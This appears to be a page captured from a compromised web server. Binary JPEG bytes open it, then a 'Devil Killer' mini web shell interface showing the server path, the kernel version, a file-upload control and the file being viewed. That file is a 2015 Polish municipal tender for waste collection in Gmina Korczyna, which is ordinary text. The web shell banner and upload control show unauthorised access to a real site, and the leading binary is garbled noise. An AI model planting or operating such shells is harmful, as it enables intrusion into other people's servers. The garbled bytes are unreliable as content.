JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150416/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150416/53777-N-2015.html

<p class="kh_header"><b>Korczyna: Odbiór, transport i zagospodarowanie odpadów komunalnych z terenu Gminy Korczyna</b><br>
<b>Numer ogłoszenia: 53777 - 2015; data zamieszczenia: 16.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Korczyna , ul. Rynek 18a, 38-420 Korczyna, woj. podkarpackie, tel. 013 4354080, faks 013 4354096.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> korczyna.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór, transport i zagospodarowanie odpadów komunalnych z terenu Gminy Korczyna.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest odbiór, transport i zagospodarowanie wszystkich odpadów komunalnych powstałych na nieruchomościach zamieszkałych położonych na terenie Gminy Korczyna wystawionych przez właścicieli (współwłaścicieli, użytkowników wieczystych, posiadaczy, najemców) w workach foliowych o poj. 120l i 60l oznaczonych naklejką z adresem nieruchomości w dniach wywozu określonych w harmonogramie wywozu.

2. W ciągu 7 dni od zawarcia umowy Zamawiający przekaże Wykonawcy wykaz nieruchomości zamieszkałych objętych przedmiotowym zamówieniem (z wyodrębnieniem nieruchomości deklarujących segregację odpadów oraz pakietów określonych w pkt 5.4.1 i 5.5.1. specyfikacji). W przypadku konieczności objęcia w trakcie trwania umowy odbiorem odpadów dodatkowych nieruchomości zamieszkałych Zamawiający przekaże Wykonawcy wykaz takich nieruchomości, a Wykonawca włączy je do przedmiotu zamówienia.

3. Zamówienie dotyczy następujących rodzajów odpadów:
- niesegregowanych (zmieszanych) odpadów komunalnych,
- selektywnie zbieranych odpadów komunalnych tj. tworzywa sztuczne, szkło, metal, papier, opakowania wielomateriałowe, 
- odpadów biodegradowalnych,
- odpadów zielonych,
- popiół i odpady paleniskowe,
- odpady wielkogabarytowe - kod odpadu 20 03 07 odbierane będą w ramach punktu selektywnej zbiórki odpadów 
- odpady elektryczne i elektroniczne odbierane będą w ramach punktu selektywnej zbiórki odpadów: 
- lampy fluorescencyjne i inne odpady zawierające rtęć - kod odpadu 20 01 21,
- urządzenia zawierające freony - kod odpadu 20 01 23,
- zużyte urządzenia elektryczne i elektroniczne inne niż wymienione w 20 01 21, 20 01 23 zawierające niebezpieczne składniki - kod odpadu 20 01 35,
- zużyte urządzenia elektryczne i elektroniczne inne niż wymienione w 20 01 21, 20 01 23 i 20 01 35 - kod odpadu 20 01 36,
- baterie i akumulatory odbierane będą w ramach punktu selektywnej zbiórki odpadów:
- baterie i akumulatory łącznie z bateriami i akumulatorami wymienionymi w 16 06 01, 16 06 02 lub 16 06 03, kod odpadu 20 01 33,
- baterie i akumulatory inne niż wymienione w 20 01 33 - kod odpadu 20 01 34.
- leki odbierane będą w ramach punktu selektywnej zbiórki odpadów: 
- leki cytotoksyczne i cytostatyczne - kod odpadu: 20 01 31,
- leki inne niż wymienione w 20 01 31 - kod odpadu 20 01 32,
- chemikalia odbierane będą w ramach punktu selektywnej zbiórki odpadów:
- farby, tusze, farby drukarskie, kleje, lepiszcze i żywice zawierające substancje niebezpieczne- kod odpadu 20 01 27,
- farby, tusze, farby drukarskie, kleje, lepiszcze i żywice inne niż wymienione w 20 01 27- kod odpadu 20 01 28, 
- środki ochrony roślin I i II klasy toksyczności (bardzo toksyczne i toksyczne np. herbicydy, insektycydy) - kod odpadu 20 01 19,
- środki ochrony roślin inne niż wymienione w 20 01 19 - kod odpadu 20 01 80,
- opakowania zawierające pozostałości substancji niebezpiecznych lub nimi zanieczyszczone  (np. środkami ochrony roślin I i II klasy toksyczności - bardzo toksyczne i toksyczne) - kod odpadu 15 01 10,
- detergenty zawierające substancje niebezpieczne - kod 20 01 29,
- detergenty inne niż wymienione w 20 01 29,
- zużyte opony o szerokości zewnętrznej do 400 mm - kod odpadu 16 01 03 odbierane będą w ramach punktu selektywnej zbiórki odpadów, 
- tekstylia odbierane będą w ramach punktu selektywnej zbiórki odpadów: 
- opakowania z tekstyliów - kod odpadu 15 01 09,
- tekstylia - kod odpadu 20 01 11,
- odzież - kod odpadu 20 01 10.
- odpady budowlane i rozbiórkowe, w ilości do 600 l. na rok od gospodarstwa domowego, odbierane będą w ramach punktu selektywnej zbiórki odpadów
- odpady z betonu oraz gruz betonowy z rozbiórek i remontów - kod odpadu 17 01 01,
- gruz ceglany - kod odpadu 17 01 02,
- odpady innych materiałów ceramicznych i elementów wyposażenia - kod odpadu 17 01 03,
- usunięte tynki, tapety, okleiny itp.- kod odpadu 17 01 80
- materiały konstrukcyjne zawierające gips - kod odpadu 17 08 02,
- materiały izolacyjne inne niż wymienione w 17 06 01 i 17 06 03- kod odpadu 17 06 04,
- szyby okienne i drzwiowe - kod odpadu 17 02 02.
- oleje i tłuszcze: odbierane będą w ramach punktu selektywnej zbiórki odpadów: 
- oleje i tłuszcze jadalne - kod odpadu 20 01 25,
- oleje i tłuszcze inne niż wymienione w 20 01 29 - kod odpadu 20 01 26.

4. Wymagania dodatkowe w ramach przedmiotu zamówienia:
4.1 Zebrane odpady Wykonawca zobowiązany jest zagospodarować zgodnie z obowiązującymi przepisami prawnymi, zwłaszcza art. 9e ustawy z dnia 13 września 1996 o utrzymaniu czystości i porządku w gminach (Dz.U. 2013, poz. 1399 z późn.zm) oraz hierarchią sposobów postępowania z odpadami określoną w art. 17 ustawy z dnia 14 grudnia 2012r. o odpadach (Dz.U.2013r., Nr 21 z późn.zm.). Ponadto Zamawiający informuje, że ma zawartą umowę wykonawczą z dnia 27 czerwca 2013r. pomiędzy Gminą Krosno a Gminą Korczyna dotyczącą zasad współpracy w zakresie dostarczania do RIPOK w Krośnie zmieszanych odpadów komunalnych i odpadów zielonych wytworzonych na terenie Gminy Korczyna (załącznik nr 11 do specyfikacji). Zgodnie z wymogiem §3 pkt. 1 ww. umowy, Zamawiający informuje o wymogu dotyczącym przekazywania odpadów komunalnych i odpadów zielonych wytworzonych na terenie Gminy Korczyna do RIPOK w Krośnie - Zakładu Unieszkodliwiania Odpadów w Krośnie.

4.2 Punkt selektywnej zbiórki odpadów komunalnych (zwany dalej punktem) położony w Korczynie przy ul. Spółdzielczej.

4.2.1 Wykonawca zapewni odbiór, transport i zagospodarowanie odpadów z punktu.

4.2.2. W punkcie gromadzone będą następujące rodzaje odpadów:
- odpady wielkogabarytowe -  kod odpadu 20 03 07,
- odpady elektryczne i elektroniczne:
- lampy fluorescencyjne i inne odpady zawierające rtęć - kod odpadu 20 01 21,
- urządzenia zawierające freony - kod odpadu 20 01 23,
- zużyte urządzenia elektryczne i elektroniczne inne niż wymienione w 20 01 21, 20 01 23 
zawierające niebezpieczne składniki - kod odpadu 20 01 35,
- zużyte urządzenia elektryczne i elektroniczne inne niż wymienione w 20 01 21, 20 01 23 i
20 01 35 - kod odpadu 20 01 36,
- baterie i akumulatory:
- baterie i akumulatory łącznie z bateriami i akumulatorami wymienionymi w 16 06 01, 16 06 
02 lub 16 06 03, kod odpadu 20 01 33,
- baterie i akumulatory inne niż wymienione w 20 01 33 - kod odpadu 20 01 34,
- leki:
- leki cytotoksyczne i cytostatyczne - kod odpadu: 20 01 31,
- leki inne niż wymienione w 20 01 31 - kod odpadu 20 01 32,
- chemikalia:- farby, tusze, farby drukarskie, kleje, lepiszcze i żywice zawierające substancje 
niebezpieczne- kod odpadu 20 01 27,
- farby, tusze, farby drukarskie, kleje, lepiszcze i żywice inne niż wymienione w 20 01 27- 
kod odpadu 20 01 28, 
- środki ochrony roślin I i II klasy toksyczności (bardzo toksyczne i toksyczne np. herbicydy, 
insektycydy) - kod odpadu 20 01 19,
- środki ochrony roślin inne niż wymienione w 20 01 19 - kod odpadu 20 01 80,
- opakowania zawierające pozostałości substancji niebezpiecznych lub nimi zanieczyszczone (np. środkami ochrony roślin I i II klasy toksyczności - bardzo toksyczne i toksyczne) - kod odpadu 15 01 10,
- detergenty zawierające substancje niebezpieczne - kod 20 01 29,
- detergenty inne niż wymienione w 20 01 29,
- zużyte opony o szerokości zewnętrznej do 400 mm - kod odpadu 16 01 03,
- tekstylia:
- opakowania z tekstyliów - kod odpadu 15 01 09,
- tekstylia - kod odpadu 20 01 11,
- odzież - kod odpadu 20 01 10,
- odpady budowlane i rozbiórkowe, w ilości do 600 l. na rok od gospodarstwa domowego
- odpady z betonu oraz gruz betonowy z rozbiórek i remontów - kod odpadu 17 01 01,
- gruz ceglany - kod odpadu 17 01 02,
- odpady innych materiałów ceramicznych i elementów wyposażenia - kod odpadu 17 01 03,
- usunięte tynki, tapety, okleiny itp.- kod odpadu 17 01 80,
- materiały konstrukcyjne zawierające gips - kod odpadu 17 08 02,
- materiały izolacyjne inne niż wymienione w 17 06 01 i 17 06 03- kod odpadu 17 06 04,
- szyby okienne i drzwiowe - kod odpadu 17 02 02,
- oleje i tłuszcze:
- oleje i tłuszcze jadalne - kod odpadu 20 01 25,
- oleje i tłuszcze inne niż wymienione w 20 01 29 - kod odpadu 20 01 26,
- odpady zielone, w ilości do 600 l. na rok od gospodarstwa domowego - kod odpadu 20 02 01.

4.2.3. Wykonawca wyposaży punkt w zgodne z obowiązującymi przepisami prawa, dostosowane do następujących rodzajów odpadów pojemniki:
- odpady wielkogabarytowe- 2 szt. kontener KP7,
- odpady elektryczne i elektroniczne - 1 szt. kontener KP7,
- baterie i akumulatory - 1 szt. pojemnik o poj. 60 l.,
- leki - 1 szt. pojemnik o poj. 60 l.,
- chemikalia - 1 szt. pojemnik o poj. 1,1 m3,
- zużyte opony-1 szt. kontener KP7,
- tekstylia - 1 szt. pojemnik o poj. 1,1 m3,
- odpady budowlane i rozbiórkowe- 2 szt. kontenery KP7,
- oleje i tłuszcze - 1 szt. pojemnik o poj. 1,1 m3,
- odpady zielone - 2 szt. kontener KP7.
Pojemniki dostarczone do punktu pozostają własnością Wykonawcy.
4.2.4.  Wykonawca wyposaży punkt selektywnego zbierania odpadów komunalnych do dnia 1 lipca 2015r. Wyposażenie odbędzie się w ciągu jednego dnia roboczego w godz. 700-1500. Termin wyposażenia punktu Zamawiający uzgodni z Wykonawcą pisemnie, nie później niż 14 dni przed planowanym dniem wyposażenia punktu. Lokalizacje pojemników określonych w pkt 5.2.2 specyfikacji w ramach punktu wskaże Wykonawcy obsługa punktu.
4.2.5. Odbiór odpadów z punktu odbywać się będzie po zapełnieniu poszczególnych pojemników, na podstawie telefonicznego zgłoszenia takiej konieczności przez obsługę punktu. Wykonawca odbierze odpady w ciągu 3 dni od dnia zgłoszenia. Numer telefonu na jaki zgłaszana będzie konieczność odbioru odpadów z punktu Wykonawca wskaże w umowie..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.31.00-7, 90.50.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony jeżeli Wykonawca wykaże, że: 
 a) posiada wpis do rejestru działalności regulowanej polegającej na odbiorze odpadów komunalnych z terenu Gminy Korczyna prowadzonego przez Wójta Gminy Korczyna obejmujący wszystkie rodzaje odpadów objętych niniejszym zamówieniem. 
 b)  posiada zezwolenie na transport odpadów z terenu Gminy Korczyna obejmujący wszystkie rodzaje odpadów objętych niniejszym zamówieniem.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że: 
w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonał co najmniej dwa zamówienia w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości wykonywanych w sposób ciągły przez okres minimum 12 miesięcy o masie łącznej minimum 500 Mg.
W przypadku oferty wspólnej Wykonawców warunek wiedzy i doświadczenia musi spełniać przynajmniej jeden z Wykonawców.
W celu wykazania spełniania warunku wykonawca zobowiązany jest złożyć:
 a) wykaz wykonanych zamówień w okresie odbierania odpadów komunalnych od właścicieli nieruchomości z podaniem ich masy oraz daty i miejsca wykonywania - zgodnie z załącznikiem nr 5 do SIWZ,
b) dokumenty potwierdzające, że zamówienia wykazane w wykazie zostały wykonane należycie,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że spełnia warunki techniczne określone rozporządzeniem Ministra Środowiska z dnia 11 stycznia 2013r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz. U. 2013, poz. 122).
W celu wykazania spełniania warunku wykonawca zobowiązany jest złożyć:
a) wykaz urządzeń technicznych/samochodów wykorzystywanych przy realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami (w tym kubatura lub ładowność samochodów) spełniających wymogi § 3 - § 5ww. rozporządzenia - zgodnie z załącznikiem nr 6 do SIWZ,
b) wskazanie bazy magazynowo - transportowej usytuowanej na terenie Gminy Korczyna lub w odległości nie większej niż 60 km od granicy Gminy Korczyna, na terenie, do którego Wykonawca posiada tytuł prawny, spełniającej wymogi § 2 ust 2 - 4 ww. rozporządzenia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony jeżeli Wykonawca wykaże, iż dysponuje osobami zdolnymi do wykonania zamówienia. W przypadku oferty wspólnej wykonawców warunek spełnić można łącznie.
W celu wykazania spełniania warunku wykonawca zobowiązany jest:
a) złożyć wykaz osób, które będą uczestniczyć w wykonaniu zamówienia wraz z informacją na temat ich kwalifikacji zawodowych - zgodnie z załącznikiem nr 4 do SIWZ,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie przez Wykonawcę posiadania opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.
W celu wykazania spełniania warunku wykonawca zobowiązany jest złożyć dokument przedmiotowej polisy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - termin płatności faktur - 2</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zgodnie z art. 144 ust. 1 ustawy Zamawiający dopuszcza możliwość zmiany umowy zawartej z Wykonawcą. Umowa może ulec zmianie w następujących sytuacjach:
a/ w przypadku opóźnienia Zamawiającego w rozstrzygnięciu przetargu,
b/ działania siły wyższej,
c/ zmiany obowiązującego prawa powodujące, że realizacja przedmiotu umowy w niezmienionej postaci staje się niecelowa,
d/  innych przeszkód uniemożliwiających realizację zamówienia, za które nie odpowiada wykonawca,
e/ wynagrodzenie Wykonawcy określone w umowie może ulec zmianie w następujących przypadkach:
-zmiana stawki urzędowej podatku VAT,
-rezygnacja z części zamówienia, jeśli taka rezygnacja będzie niezbędna do prawidłowej realizacji przedmiotu umowy lub których wykonanie nie będzie konieczne lub będzie bezcelowe w przypadku zaistnienia okoliczności, których nie można było przewidzieć w chwili zawarcia umowy - o wartość niewykonanych robót.  
2.	Inne zmiany:
a/ w zakresie podwykonawstwa  za uprzednią zgodą Zamawiającego:
- powierzenie podwykonawcom innej części robót niż wskazana w ofercie Wykonawcy,
- zmiana podwykonawcy na etapie realizacji robót,
b/ w przypadku aktualizacji rozwiązań z uwagi na postęp techniczny lub zmiany obowiązujących przepisów.
3. Warunki zmian:
a/ inicjowanie zmian - na pisemny wniosek Wykonawcy lub Zamawiającego,
b/ uzasadnienie zmian - prawidłowa realizacja przedmiotu umowy, obniżenie kosztów, zapewnienie optymalnych parametrów technicznych i jakościowych robót,
c/ forma zmian - aneks do umowy w formie pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
